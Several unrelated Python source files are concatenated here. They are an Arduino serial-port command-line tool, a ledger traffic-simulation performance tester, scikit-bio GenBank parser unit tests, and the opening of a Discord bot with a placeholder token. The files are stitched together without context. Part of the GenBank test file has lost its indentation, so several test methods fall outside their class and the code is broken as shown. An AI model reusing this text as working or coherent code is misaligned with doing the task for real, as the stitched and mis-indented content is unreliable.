        (e.g. "/dev/tty.usbserial","COM1") and a baud rate (bps) and
        connects to that port at that speed and 8N1. Opens the port in
        fully raw mode so you can send binary data.
        """
        # O_NOCTTY: don't become the controlling terminal; O_NDELAY: don't
        # block on open waiting for carrier detect.
        self.fd = os.open(serialport, os.O_RDWR | os.O_NOCTTY | os.O_NDELAY)
        attrs = termios.tcgetattr(self.fd)
        bps_sym = bps_to_termios_sym(bps)
        # Set I/O speed.
        attrs[ISPEED] = bps_sym
        attrs[OSPEED] = bps_sym
        # 8N1
        attrs[CFLAG] &= ~termios.PARENB
        attrs[CFLAG] &= ~termios.CSTOPB
        attrs[CFLAG] &= ~termios.CSIZE
        attrs[CFLAG] |= termios.CS8
        # No flow control
        attrs[CFLAG] &= ~termios.CRTSCTS
        # Turn on READ & ignore control lines.
        attrs[CFLAG] |= termios.CREAD | termios.CLOCAL
        # Turn off software flow control.
        attrs[IFLAG] &= ~(termios.IXON | termios.IXOFF | termios.IXANY)
        # Make raw.
        attrs[LFLAG] &= ~(termios.ICANON | termios.ECHO | termios.ECHOE | termios.ISIG)
        attrs[OFLAG] &= ~termios.OPOST
        # It's complicated--See
        # http://unixwiz.net/techtips/termios-vmin-vtime.html
        # VMIN=0 / VTIME=20: a read returns immediately with whatever is
        # buffered, or empty after a 2-second timeout.
        attrs[CC][termios.VMIN] = 0;
        attrs[CC][termios.VTIME] = 20;
        termios.tcsetattr(self.fd, termios.TCSANOW, attrs)
    def read_until(self, until):
        """Read one byte at a time until *until* is seen; return everything
        read, including the terminator itself.
        """
        buf = ""
        done = False
        while not done:
            n = os.read(self.fd, 1)
            if n == '':
                # FIXME: Maybe worth blocking instead of busy-looping?
                time.sleep(0.01)
                continue
            buf = buf + n
            if n == until:
                done = True
        return buf
    def write(self, str):
        # NOTE(review): the parameter name shadows the builtin ``str``.
        os.write(self.fd, str)
    def write_byte(self, byte):
        # Send a single byte given as an int 0-255 (Python 2 ``chr``).
        os.write(self.fd, chr(byte))
def main(args):
    """Process command-line options strictly in the order given (see usage()).

    NOTE(review): options are order-sensitive by design: '-b' must precede
    '-p' because the port is opened the moment '-p' is parsed, and
    '-s'/'-n'/'-r' require an already-opened port — otherwise ``port`` is
    still None and an AttributeError escapes.  '-h' prints help but does not
    exit, so remaining options still run.  Python 2 syntax throughout.
    """
    port = None
    bps = 9600
    try:
        optlist, args = getopt.getopt(args[1:], 'hp:b:s:rn:d:',
                                      ['help', 'port=', 'baud=', 'send=', 'receive',
                                       'num=', 'delay='])
        for (o, v) in optlist:
            if o == '-d' or o == '--delay':
                # Delay is given in milliseconds; time.sleep takes seconds.
                n = float(v) / 1000.0
                time.sleep(n)
            elif o == '-h' or o =='--help':
                usage()
            elif o == '-b' or o =='--baud':
                bps = int(v)
            elif o == '-p' or o =='--port':
                port = SerialPort(v, bps)
            elif o =='-n' or o =='--num':
                n = int(v)
                port.write_byte(n)
            elif o == '-s' or o == '--send':
                port.write(v)
            elif o == '-r' or o == '--receive':
                print "Read %s" % (port.read_until('\n'),)
        sys.exit(0)
    except getopt.GetoptError, e:
        # Python 2 except syntax; ``e.msg`` is the getopt error text.
        sys.stderr.write("%s: %s\n" % (args[0], e.msg))
        usage()
        sys.exit(1)
def usage():
    """Print the command-line help text to stdout (does not exit;
    the caller decides whether to terminate)."""
    print """Usage: arduino-serial.py -p <serialport> [OPTIONS]
    Options:
    -h, --help Print this help message.
    -p, --port=SERIALPORT Serial port Arduino is on.
    -b, --baud=BAUDRATE Baudrate (bps) of Arduino.
    -s, --send=DATA Send data to Arduino.
    -r, --receive Receive data from Arduino & print it out.
    -n --num=NUM Send a number as a single byte.
    -d --delay=MILLIS Delay for specified milliseconds.
    Note: Order is important. Set '-b' before doing '-p'.
    Used to make series of actions: '-d 2000 -s hello -d 100 -r'
    means 'wait 2 seconds, send 'hello', wait 100 msec, get reply'.
    """
if __name__ == '__main__':
    # Script entry point: main() receives the full argv (it strips argv[0]).
    main(sys.argv)
|
"""
Created on Feb 27, 2018
@author: nhan.nguyen
This module contains class "TesterSimulateTraffic" that simulates the real time
traffic.
"""
import threading
import random
import time
import utils
import os
import asyncio
import argparse
import requests_sender
import requests_builder
import perf_add_requests
from perf_tester import Tester
class Option:
    """Command-line options for the traffic-simulation script.

    Parses ``sys.argv`` once at construction; the parsed namespace is exposed
    as ``self.args`` with attributes ``clients``, ``transactions_delay``,
    ``log``, ``time_out`` and ``number_of_request_samples``.

    Fix: two help/description strings were broken by missing spaces at the
    implicit string-literal joins ("...will sendrequest to ledger..." and
    "...does not exist,program...").
    """

    def __init__(self):
        parser = argparse.ArgumentParser(
            description='Script to simulate the traffic which will send '
                        'request to ledger in several sets. Each set contains '
                        'a specified number of requests and between two set, '
                        'the system will be delayed for a random length of'
                        ' time (from 1 to 10 seconds).\n\n',
            usage='To create 5 client to simulate the traffic in 50 seconds '
                  'and you want each set contains 100 request.'
                  '\nuse: python3.6 perf_traffic.py -c 5 -t 50 -n 100')
        parser.add_argument('-c',
                            help='Specify the number of clients '
                                 'will be simulated. Default value will be 1.',
                            action='store',
                            type=int, default=1, dest='clients')
        # NOTE: dest is 'transactions_delay' although the value is the number
        # of transactions per set — kept for backward compatibility.
        parser.add_argument('-n',
                            help='Number of transactions will be sent '
                                 'in a set. Default value will be 100.',
                            action='store', type=int,
                            default=100, dest='transactions_delay')
        parser.add_argument('--log',
                            help='To see all log. If this flag does not exist, '
                                 'program just only print fail message',
                            action='store_true', default=False, dest='log')
        parser.add_argument('-to',
                            help='Timeout of testing. '
                                 'Default value will be 100.',
                            action='store', type=int,
                            default=100, dest='time_out')
        parser.add_argument('--init',
                            help='To build "GET" request, we need to '
                                 'send "ADD" request first. This argument is '
                                 'the number of "ADD" request will be sent '
                                 'to ledger to make sample for "GET" requests.'
                                 ' Default value will be 100',
                            action='store', type=int,
                            default=100, dest='number_of_request_samples')
        self.args = parser.parse_args()
def catch_number_of_request_samples():
    """
    Parse number of sample of "GET" requests will be created.
    If the number is less than of equal with zero, default value (100) will be
    returned.
    :return: number of sample of "GET" requests.
    """
    import sys
    default = 100
    argv = sys.argv
    # Guard clauses instead of the original nested ifs.
    if "--init" not in argv:
        return default
    pos = argv.index("--init")
    if pos >= len(argv) - 1:
        # "--init" was the last token: no value follows.
        return default
    try:
        value = int(argv[pos + 1])
    except ValueError:
        return default
    return value if value > 0 else default
class TesterSimulateTraffic(Tester):
    """Simulate real-time ledger traffic with several client threads.

    Each client thread runs its own asyncio event loop and repeatedly builds
    and sends a randomly chosen request; after every ``transactions_delay``
    transactions (counted globally across threads) the sender sleeps for a
    random 1-10 s to create bursts.
    """
    # Shared cache of sample request info, keyed by request kind; filled once
    # by _prepare_samples_for_get_req.
    __sample_req_info = {}
    __kinds_of_request = ["nym", "attribute", "schema", "claim",
                          "get_nym", "get_attribute", "get_schema",
                          "get_claim"]
    # Evaluated at class-definition time from sys.argv (see module function).
    __number_of_request_samples = catch_number_of_request_samples()
    def __init__(self, number_of_clients: int = 2,
                 transactions_delay: int = 100,
                 time_out: int = 300, log=False,
                 seed="000000000000000000000000Trustee1"):
        super().__init__(log=log, seed=seed)
        utils.run_async_method(
            None, TesterSimulateTraffic._prepare_samples_for_get_req,
            TesterSimulateTraffic.__number_of_request_samples)
        # NOTE(review): on invalid arguments this returns early and leaves the
        # instance only partially initialized (no transactions_delay etc.) —
        # a later _test() call would fail with AttributeError.
        if time_out <= 0 or transactions_delay <= 0 or number_of_clients <= 0:
            return
        self.transactions_delay = transactions_delay
        self.time_out = time_out
        self.number_of_clients = number_of_clients
        self.current_total_txn = 0
        self.__current_time = time.time()
        self.__lock = threading.Lock()
        self.__sender = requests_sender.RequestsSender()
    async def _test(self):
        """
        Override from "Tester" class to implement testing steps.
        """
        lst_threads = list()
        self.__current_time = time.time()
        for _ in range(self.number_of_clients):
            thread = threading.Thread(target=self.__simulate_client)
            # Daemon threads so a hung client cannot keep the process alive.
            thread.setDaemon(True)
            thread.start()
            lst_threads.append(thread)
        for thread in lst_threads:
            # Allow a 10% margin over the configured timeout before giving up.
            thread.join(self.time_out * 1.1)
        # Copy aggregated statistics from the shared sender.
        self.passed_req = self.__sender.passed_req
        self.failed_req = self.__sender.failed_req
        self.fastest_txn = self.__sender.fastest_txn
        self.lowest_txn = self.__sender.lowest_txn
    def __update(self):
        """
        Synchronize within threads to update some necessary information.
        """
        # NOTE(review): plain acquire/release — an exception between them
        # would leave the lock held; 'with self.__lock:' would be safer.
        self.__lock.acquire()
        if self.start_time == 0 and self.finish_time != 0:
            self.start_time = self.finish_time
        # Pause 1-10 s between sets of 'transactions_delay' transactions.
        if self.current_total_txn != 0 and \
                self.current_total_txn % self.transactions_delay == 0:
            time.sleep(random.randint(1, 10))
        self.current_total_txn += 1
        self.__lock.release()
    def __simulate_client(self):
        """
        Simulate a client to create real time traffic.
        """
        # Each thread needs its own event loop for the async request helpers.
        loop = asyncio.new_event_loop()
        args = {"wallet_handle": self.wallet_handle,
                "pool_handle": self.pool_handle,
                "submitter_did": self.submitter_did}
        asyncio.set_event_loop(loop)
        while True:
            self.__update()
            if time.time() - self.__current_time >= self.time_out:
                break
            self.finish_time = utils.run_async_method(
                loop, TesterSimulateTraffic._build_and_send_request,
                self.__sender, args)
        loop.close()
    @staticmethod
    async def generate_sample_request_info(kind,
                                           sample_num: int = 100) -> list:
        """
        Generate sample request information.
        :param kind: kind of request.
        :param sample_num: number of samples will be generated.
        :return: a list of samples request information.
        """
        kinds = ["nym", "schema", "attribute", "claim"]
        if kind not in kinds or sample_num <= 0:
            return []
        generator = perf_add_requests.PerformanceTesterForAddingRequest(
            request_num=sample_num, request_kind=kind)
        await generator.test()
        # Harvest the info file the generator wrote, skipping blank-ish lines.
        lst_info = list()
        with open(generator.info_file_path, "r") as info_file:
            for line in info_file:
                if len(line) > 2:
                    lst_info.append(line)
        # Best-effort cleanup of the temporary info file.
        try:
            os.remove(generator.info_file_path)
        except IOError:
            pass
        return lst_info
    @staticmethod
    async def _prepare_samples_for_get_req(sample_num: int = 100):
        """
        Init samples for "GET" requests.
        :param sample_num: create a number of samples request information for
                           each kind of request (nym, attribute, claim, schema)
        """
        # Already populated (class-level cache) — nothing to do.
        if TesterSimulateTraffic.__sample_req_info:
            return
        keys = ["nym", "attribute", "schema", "claim"]
        if sample_num <= 0:
            return
        for key in keys:
            TesterSimulateTraffic.__sample_req_info[key] = \
                await TesterSimulateTraffic.generate_sample_request_info(
                    key, sample_num)
    @staticmethod
    def _random_req_kind():
        """
        Random choice a request kind.
        :return: request kind.
        """
        return random.choice(TesterSimulateTraffic.__kinds_of_request)
    @staticmethod
    def _random_sample_for_get_request(kind: str):
        """
        Choice randomly a sample of request info base on kind of request.
        :param kind: kind of request (get_nym, get_attribute,
                     get_claim, get_schema).
        :return: a random sample of request info.
        """
        # "get_*" requests reuse samples created for the matching "add" kind.
        if kind.startswith("get_"):
            return random.choice(
                TesterSimulateTraffic.__sample_req_info[kind.replace(
                    "get_", "")])
        return ""
    @staticmethod
    async def _build_and_send_request(sender, args):
        """
        Build a request and send it onto ledger.
        :param sender: send the request.
        :param args: contains some arguments to send request to ledger
                     (pool handle, wallet handle, submitter did)
        :return: response time.
        """
        kind = TesterSimulateTraffic._random_req_kind()
        data = TesterSimulateTraffic._random_sample_for_get_request(kind)
        req = await requests_builder.RequestBuilder.build_request(args, kind,
                                                                  data)
        return await sender.send_request(args, kind, req)
if __name__ == '__main__':
    # Parse CLI options, run the traffic simulation, then print a summary.
    opts = Option().args
    tester = TesterSimulateTraffic(number_of_clients=opts.clients,
                                   transactions_delay=opts.transactions_delay,
                                   time_out=opts.time_out, log=opts.log)
    utils.run_async_method(None, tester.test)
    # NOTE(review): assumes Tester set start_time/finish_time during test().
    elapsed_time = tester.finish_time - tester.start_time
    utils.print_client_result(tester.passed_req, tester.failed_req,
                              elapsed_time)
|
# ----------------------------------------------------------------------------
# Copyright (c) 2013--, scikit-bio development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
# ----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function
from future.builtins import map, zip
import io
import numpy as np
import pandas as pd
import numpy.testing as npt
import six
from unittest import TestCase, main
from datetime import datetime
from skbio import Protein, DNA, RNA, Sequence
from skbio.util import get_data_path
from skbio.io import GenBankFormatError
from skbio.io.format.genbank import (
_genbank_sniffer,
_genbank_to_generator, _genbank_to_sequence,
_genbank_to_dna, _genbank_to_rna, _genbank_to_protein,
_parse_locus, _parse_reference,
_parse_loc_str, _parse_section_default,
_generator_to_genbank, _sequence_to_genbank,
_protein_to_genbank, _rna_to_genbank, _dna_to_genbank,
_serialize_locus)
class SnifferTests(TestCase):
    # Fixture files the GenBank sniffer must accept / reject.
    def setUp(self):
        positive_names = [
            'genbank_5_blanks_start_of_file',
            'genbank_single_record_upper',
            'genbank_single_record_lower',
            'genbank_multi_records',
        ]
        negative_names = [
            'empty',
            'whitespace_only',
            'genbank_6_blanks_start_of_file',
            'genbank_w_beginning_whitespace',
            'genbank_missing_locus_name',
        ]
        self.positive_fps = [get_data_path(name) for name in positive_names]
        self.negative_fps = [get_data_path(name) for name in negative_names]
    def test_positives(self):
        for path in self.positive_fps:
            self.assertEqual(_genbank_sniffer(path), (True, {}))
    def test_negatives(self):
        for path in self.negative_fps:
            self.assertEqual(_genbank_sniffer(path), (False, {}))
class GenBankIOTests(TestCase):
    # parent class to set up test data for the child class
    def setUp(self):
        """Build fixtures shared by reader/writer subclasses: canned LOCUS
        lines plus single-record (protein, RNA) and multi-record files, each
        paired with its expected (sequence, metadata, positional_metadata,
        constructor) tuple.
        """
        # test locus line
        self.locus = (
            (['LOCUS NC_005816 9609 bp '
              'DNA circular CON 07-FEB-2015'],
             {'division': 'CON', 'mol_type': 'DNA', 'shape': 'circular',
              'locus_name': 'NC_005816', 'date': datetime(2015, 2, 7, 0, 0),
              'unit': 'bp', 'size': 9609}),
            (['LOCUS SCU49845 5028 bp '
              'DNA PLN 21-JUN-1999'],
             {'division': 'PLN', 'mol_type': 'DNA', 'shape': None,
              'locus_name': 'SCU49845', 'date': datetime(1999, 6, 21, 0, 0),
              'unit': 'bp', 'size': 5028}),
            (['LOCUS NP_001832 360 aa '
              'linear PRI 18-DEC-2001'],
             {'division': 'PRI', 'mol_type': None, 'shape': 'linear',
              'locus_name': 'NP_001832', 'date': datetime(2001, 12, 18, 0, 0),
              'unit': 'aa', 'size': 360}))
        # test single record and read uppercase sequence
        self.single_upper_fp = get_data_path('genbank_single_record_upper')
        self.single_lower_fp = get_data_path('genbank_single_record_lower')
        self.single = (
            'GSREILDFK',
            {'LOCUS': {'date': datetime(1994, 9, 23, 0, 0),
                       'division': 'BCT',
                       'locus_name': 'AAB29917',
                       'mol_type': None,
                       'shape': 'linear',
                       'size': 9,
                       'unit': 'aa'}},
            None,
            Protein)
        self.single_rna_fp = get_data_path('genbank_single_record')
        self.single_rna = (
            'gugaaacaaagcacuauugcacuggcugucuuaccguuacuguuuaccccugugacaaaagcc',
            {'ACCESSION': 'M14399',
             'COMMENT': 'Original source text: E.coli, cDNA to mRNA.',
             'DEFINITION': u"alkaline phosphatase signal mRNA, 5' end.",
             'FEATURES': [{'db_xref': '"taxon:562"',
                           'index_': 0,
                           'left_partial_': False,
                           'location': '1..63',
                           'mol_type': '"mRNA"',
                           'organism': '"Escherichia coli"',
                           'rc_': False,
                           'right_partial_': False,
                           'type_': 'source'},
                          {'codon_start': '1',
                           'db_xref': [
                               '"GI:145230"', '"taxon:562"', '"taxon:561"'],
                           'index_': 1,
                           'left_partial_': False,
                           'location': '1..>63',
                           'note': '"alkaline phosphatase signal peptide"',
                           'protein_id': '"AAA23431.1"',
                           'rc_': False,
                           'right_partial_': True,
                           'transl_table': '11',
                           'translation': '"MKQSTIALAVLPLLFTPVTKA"',
                           'type_': 'CDS'}],
             'KEYWORDS': 'alkaline phosphatase; signal peptide.',
             'LOCUS': {'date': datetime(1993, 4, 26, 0, 0),
                       'division': 'BCT',
                       'locus_name': 'ECOALKP',
                       'mol_type': 'mRNA',
                       'shape': 'linear',
                       'size': 63,
                       'unit': 'bp'},
             'SOURCE': {'ORGANISM': 'Escherichia coli',
                        'taxonomy': 'Bacteria; Proteobacteria; '
                        'Gammaproteobacteria; Enterobacteriales; '
                        'Enterobacteriaceae; Escherichia.'},
             'VERSION': 'M14399.1 GI:145229'},
            pd.DataFrame({0: np.ones(63, dtype=bool),
                          1: np.ones(63, dtype=bool)}),
            RNA)
        # test:
        # 1. multiple records in one file
        # 2. lowercase sequence
        # 3. DNA, RNA, Protein type
        # 4. variation of formats
        self.multi_fp = get_data_path('genbank_multi_records')
        self.multi = (
            ('gsreildfk',
             {'ACCESSION': 'AAB29917',
              'COMMENT': 'Method: direct peptide sequencing.',
              'DBSOURCE': 'accession AAB29917.1',
              'DEFINITION': 'L-carnitine amidase {N-terminal}',
              'FEATURES': [{'index_': 0,
                            'left_partial_': False,
                            'location': '1..9',
                            'organism': '"Bacteria"',
                            'rc_': False,
                            'right_partial_': False,
                            'type_': 'source'},
                           {'index_': 1,
                            'left_partial_': False,
                            'location': '1..>9',
                            'product': '"L-carnitine amidase"',
                            'rc_': False,
                            'right_partial_': True,
                            'type_': 'Protein'}],
              'KEYWORDS': '.',
              'LOCUS': {'date': datetime(1994, 9, 23, 0, 0),
                        'division': 'BCT',
                        'locus_name': 'AAB29917',
                        'mol_type': None,
                        'shape': 'linear',
                        'size': 9,
                        'unit': 'aa'},
              'REFERENCE': [{'AUTHORS': 'Joeres,U. and Kula,M.R.',
                             'JOURNAL': 'AMB 40 (5), 606-610 (1994)',
                             'PUBMED': '7764422',
                             'REFERENCE': '1 (residues 1 to 9)',
                             'REMARK': 'from the original journal article.',
                             'TITLE': 'a microbial L-carnitine amidase'},
                            {'AUTHORS': 'Joeres,U. and Kula,M.R.',
                             'JOURNAL': 'AMB 40 (5), 606-610 (1994)',
                             'PUBMED': '7764422',
                             'REFERENCE': '1 (residues 1 to 9)',
                             'TITLE': 'a microbial L-carnitine amidase'}],
              'SOURCE': {'ORGANISM': 'Bacteria',
                         'taxonomy': 'Unclassified.'},
              'VERSION': 'AAB29917.1 GI:545426'},
             pd.DataFrame({0: np.ones(9, dtype=bool),
                           1: np.ones(9, dtype=bool)}),
             Protein),
            ('catgcaggc',
             {'ACCESSION': 'HQ018078',
              'DEFINITION': 'Uncultured Xylanimonas sp.16S, partial',
              'FEATURES': [{'country': '"Brazil: Parana, Paranavai"',
                            'environmental_sample': '',
                            'index_': 0,
                            'left_partial_': False,
                            'location': '1..9',
                            'rc_': False,
                            'right_partial_': False,
                            'type_': 'source'},
                           {'index_': 1,
                            'left_partial_': True,
                            'location': 'complement(<2..>8)',
                            'product': '"16S ribosomal RNA"',
                            'rc_': True,
                            'right_partial_': True,
                            'type_': 'rRNA'}],
              'KEYWORDS': 'ENV.',
              'LOCUS': {'date': datetime(2010, 8, 29, 0, 0),
                        'division': 'ENV',
                        'locus_name': 'HQ018078',
                        'mol_type': 'DNA',
                        'shape': 'linear',
                        'size': 9,
                        'unit': 'bp'},
              'SOURCE': {'ORGANISM': 'uncultured Xylanimonas sp.',
                         'taxonomy': 'Bacteria; Actinobacteria; '
                         'Micrococcales; Promicromonosporaceae; '
                         'Xylanimonas; environmental samples.'},
              'VERSION': 'HQ018078.1 GI:304421728'},
             pd.DataFrame({0: [True] * 9,
                           1: [False] + [True] * 7 + [False]}),
             DNA))
class ReaderTests(GenBankIOTests):
    def test_parse_reference(self):
        """A multi-line REFERENCE section parses into a flat dict; the
        wrapped TITLE continuation line is joined with a single space.
        """
        lines = '''
REFERENCE 1 (bases 1 to 154478)
 AUTHORS Sato,S., Nakamura,Y., Kaneko,T., and Tabata,S.
 TITLE Complete structure of the chloroplast genome of
Arabidopsis thaliana
JOURNAL DNA Res. 6 (5), 283-290 (1999)
PUBMED 10574454'''.split('\n')
        exp = {'AUTHORS': 'Sato,S., Nakamura,Y., Kaneko,T., and Tabata,S.',
               'JOURNAL': 'DNA Res. 6 (5), 283-290 (1999)',
               'PUBMED': '10574454',
               'REFERENCE': '1 (bases 1 to 154478)',
               'TITLE': ('Complete structure of the chloroplast genome of'
                         ' Arabidopsis thaliana')}
        self.assertEqual(_parse_reference(lines), exp)
def test_parse_locus(self):
for serialized, parsed in self.locus:
self.assertEqual(_parse_locus(serialized), parsed)
    def test_parse_locus_invalid(self):
        """Malformed LOCUS lines (missing unit/division, bad date) raise
        GenBankFormatError with the expected message.
        """
        lines = [
            # missing unit
            ['LOCUS NC_005816 9609 '
             ' DNA circular CON 07-FEB-2015'],
            # missing division
            ['LOCUS SCU49845 5028 bp'
             ' DNA 21-JUN-1999'],
            # wrong date format
            ['LOCUS NP_001832 360 aa'
             ' linear PRI 2001-12-18']]
        for line in lines:
            with six.assertRaisesRegex(self, GenBankFormatError,
                                       'Could not parse the LOCUS line:.*'):
                _parse_locus(line)
    def test_parse_section_default(self):
        """The default section parser honors label/join delimiters and the
        return_label flag for each (lines, kwargs, expected) triple.
        """
        lines = [
            ['FOO blah blah',
             ' blah'],
            ['FOO=blah',
             ' blah'],
            ['FOO']]
        kwargs = [{'join_delimitor': '=', 'return_label': False},
                  {'label_delimitor': '=', 'join_delimitor': '',
                   'return_label': True},
                  {'label_delimitor': '=', 'join_delimitor': '=',
                   'return_label': True}]
        expects = ['blah blah=blah',
                   ('FOO', 'blahblah'),
                   ('FOO', '')]
        for i, j, k in zip(lines, kwargs, expects):
            self.assertEqual(k, _parse_section_default(i, **j))
def test_parse_loc_str(self):
length = 12
examples = [
'',
'9', # a single base in the presented sequence
'3..8',
'<3..8',
'1..>8',
'complement(3..8)',
'complement(join(3..5,7..9))',
'join(3..5,7..9)',
'J00194.1:1..9',
'1.9',
'1^9']
expects = [
({'right_partial_': False, 'left_partial_': False, 'rc_': False},
np.array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], dtype=bool)),
({'right_partial_': False, 'left_partial_': False, 'rc_': False},
np.array([0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0], dtype=bool)),
({'right_partial_': False, 'left_partial_': False, 'rc_': False},
np.array([0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0], dtype=bool)),
({'right_partial_': False, 'left_partial_': True, 'rc_': False},
np.array([0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0], dtype=bool)),
({'right_partial_': True, 'left_partial_': False, 'rc_': False},
np.array([1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0], dtype=bool)),
({'right_partial_': False, 'left_partial_': False, 'rc_': True},
np.array([0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0], dtype=bool)),
({'right_partial_': False, 'left_partial_': False, 'rc_': True},
np.array([0, 0, 1, 1, 1, 0, 1, 1, 1, 0, 0, 0], dtype=bool)),
({'right_partial_': False, 'left_partial_': False, 'rc_': False},
np.array([0, 0, 1, 1, 1, 0, 1, 1, 1, 0, 0, 0], dtype=bool)),
({'right_partial_': False, 'left_partial_': False, 'rc_': False},
np.zeros(length, dtype=bool)),
({'right_partial_': False, 'left_partial_': False, 'rc_': False},
np.zeros(length, dtype=bool)),
({'right_partial_': False, 'left_partial_': False, 'rc_': False},
np.zeros(length, dtype=bool))]
for example, expect in zip(examples, expects):
parsed = _parse_loc_str(example, length)
self.assertDictEqual(parsed[0], expect[0])
npt.assert_equal(parsed[1], expect[1])
def test_parse_loc_str_invalid(self):
length = 12
examples = [
'abc',
'3-8']
for example in examples:
with six.assertRaisesRegex(self, GenBankFormatError,
'Could not parse location string: '
'"%s"' % example):
_parse_loc_str(example, length)
def test_genbank_to_generator_single(self):
# test single record and uppercase sequence
for c in [Sequence, Protein]:
obs = next(_genbank_to_generator(
self.single_upper_fp, constructor=c))
exp = c(self.single[0], metadata=self.single[1],
positional_metadata=self.single[2])
self.assertEqual(exp, obs)
def test_genbank_to_generator(self):
for i, obs in enumerate(_genbank_to_generator(self.multi_fp)):
seq, md, pmd, constructor = self.multi[i]
exp = constructor(seq, metadata=md, lowercase=True,
positional_metadata=pmd)
self.assertEqual(exp, obs)
def test_genbank_to_sequence(self):
for i, exp in enumerate(self.multi):
obs = _genbank_to_sequence(self.multi_fp, seq_num=i+1)
exp = Sequence(exp[0], metadata=exp[1], lowercase=True,
positional_metadata=exp[2])
self.assertEqual(exp, obs)
def test_genbank_to_rna(self):
seq, md, pmd, constructor = self.single_rna
obs = _genbank_to_rna(self.single_rna_fp)
exp = constructor(seq, metadata=md,
lowercase=True, positional_metadata=pmd)
self.assertEqual(exp, obs)
def test_genbank_to_dna(self):
i = 1
exp = self.multi[i]
obs = _genbank_to_dna(self.multi_fp, seq_num=i+1)
exp = DNA(exp[0], metadata=exp[1], lowercase=True,
positional_metadata=exp[2])
self.assertEqual(exp, obs)
def test_genbank_to_protein(self):
i = 0
exp = self.multi[i]
obs = _genbank_to_protein(self.multi_fp, seq_num=i+1)
exp = Protein(exp[0], metadata=exp[1],
lowercase=True, positional_metadata=exp[2])
self.assertEqual(exp, obs)
class WriterTests(GenBankIOTests):
    """Tests for the GenBank serialization helpers and writer entry points."""
    def test_serialize_locus(self):
        # Serializing a parsed LOCUS mapping must reproduce the original line.
        for serialized, parsed in self.locus:
            self.assertEqual(
                _serialize_locus('LOCUS', parsed), serialized[0] + '\n')
    def test_generator_to_genbank(self):
        """Writing the single fixture record matches the lowercase file."""
        seq, md, pmd, constructor = self.single
        obj = constructor(seq, md, pmd)
        fh = io.StringIO()
        _generator_to_genbank([obj], fh)
        obs = fh.getvalue()
        fh.close()
        with io.open(self.single_lower_fp) as fh:
            exp = fh.read()
        self.assertEqual(obs, exp)
    def test_sequence_to_genbank(self):
        """Writing every multi-fixture record back-to-back matches the file."""
        fh = io.StringIO()
        for i, (seq, md, pmd, constructor) in enumerate(self.multi):
            obj = Sequence(seq, md, pmd, lowercase=True)
            _sequence_to_genbank(obj, fh)
        obs = fh.getvalue()
        fh.close()
        with io.open(self.multi_fp) as fh:
            exp = fh.read()
        self.assertEqual(obs, exp)
    def test_dna_protein_to_genbank(self):
        # Record 0 is the protein and record 1 the DNA record, so the
        # writers are dispatched per-record in that order.
        writers = [_protein_to_genbank,
                   _dna_to_genbank]
        fh = io.StringIO()
        for i, (seq, md, pmd, constructor) in enumerate(self.multi):
            obj = constructor(seq, md, pmd, lowercase=True)
            writers[i](obj, fh)
        obs = fh.getvalue()
        fh.close()
        with io.open(self.multi_fp) as fh:
            exp = fh.read()
        self.assertEqual(obs, exp)
    def test_rna_to_genbank(self):
        """Writing the RNA fixture matches the RNA reference file."""
        fh = io.StringIO()
        seq, md, pmd, constructor = self.single_rna
        obj = constructor(seq, md, pmd, lowercase=True)
        _rna_to_genbank(obj, fh)
        obs = fh.getvalue()
        fh.close()
        with io.open(self.single_rna_fp) as fh:
            exp = fh.read()
        self.assertEqual(obs, exp)
class RoundtripTests(GenBankIOTests):
    """Write-after-read tests: parsing a GenBank file and serializing the
    result must reproduce the original file byte-for-byte.
    """
    def _assert_roundtrip(self, reader, writer, path):
        # Parse ``path`` with ``reader``, serialize with ``writer``, and
        # compare the serialized text against the original file contents.
        buf = io.StringIO()
        writer(reader(path), buf)
        serialized = buf.getvalue()
        buf.close()
        with io.open(path) as fh:
            self.assertEqual(serialized, fh.read())
    def test_roundtrip_generator(self):
        self._assert_roundtrip(
            _genbank_to_generator, _generator_to_genbank, self.multi_fp)
    def test_roundtrip_rna(self):
        self._assert_roundtrip(
            _genbank_to_rna, _rna_to_genbank, self.single_rna_fp)
    def test_roundtrip_dna(self):
        self._assert_roundtrip(
            _genbank_to_dna, _dna_to_genbank, self.single_rna_fp)
    def test_roundtrip_protein(self):
        self._assert_roundtrip(
            _genbank_to_protein, _protein_to_genbank, self.single_lower_fp)
    def test_roundtrip_sequence(self):
        self._assert_roundtrip(
            _genbank_to_sequence, _sequence_to_genbank, self.single_rna_fp)
# Run the tests when this module is executed directly
# (``main`` is presumably unittest.main, imported near the top of the file
# — TODO confirm against the file header, which is outside this view).
if __name__ == '__main__':
    main()
|
print("STONK:D")
# bot.py
from operator import truediv
import os
import discord
from discord import embeds
from discord import member
#from dotenv import load_dotenv
from discord.ext import commands
import discord
from io import BytesIO
import json
import random
#from utils.useful import Embed
import DiscordUtils
#from keep_alive import keep_alive
from discord.ext.commands import errors, has_permissions, MissingPermissions
import json
import asyncio
from discord import Permissions
from prsaw import RandomStuff
from PIL import Image
import datetime
from discord import Color, Embed
import sys
import typing
import traceback
import math
import aiosqlite
from PIL import Image
import asyncpraw
import tracemalloc
tracemalloc.start()
from discord.ext.commands import has_permissions, MissingPermissions
from discord.utils import find
from discord.voice_client import VoiceClient
import youtube_dl
import aiohttp
import urllib.parse
from discord.ext import buttons
#from discord_slash import SlashCommand, SlashContext
#my_secret = os.environ['TOKEN']
#TOKEN=''
# NOTE(review): never hard-code the bot token — load it from the environment
# (the commented-out os.environ['TOKEN'] above was the right idea).
TOKEN='<PASSWORD>'
#
# All gateway intents are requested; the privileged ones must also be enabled
# in the Discord developer portal for the bot to start.
intents=discord.Intents.all()
bot = commands.Bot(command_prefix='+',intents=intents)
#slash = SlashCommand(bot)
# Drop the built-in help command so the custom +help below can register.
bot.remove_command("help")
@bot.command(description="Current version")
async def version(ctx):
    """Send the changelog embed listing every released version."""
    embed = discord.Embed(
        colour = discord.Colour.blue()
    )
    embed.set_author(name='**Update log**!')
    embed.add_field(name='1.81', value='Added +daily and +lbg minor bug fixes and patches.', inline=False)
    embed.add_field(name='1.8', value=' Added economy system, ticket system, Ai chatbot, 2 more commands and bug fixes since update 1.3!')
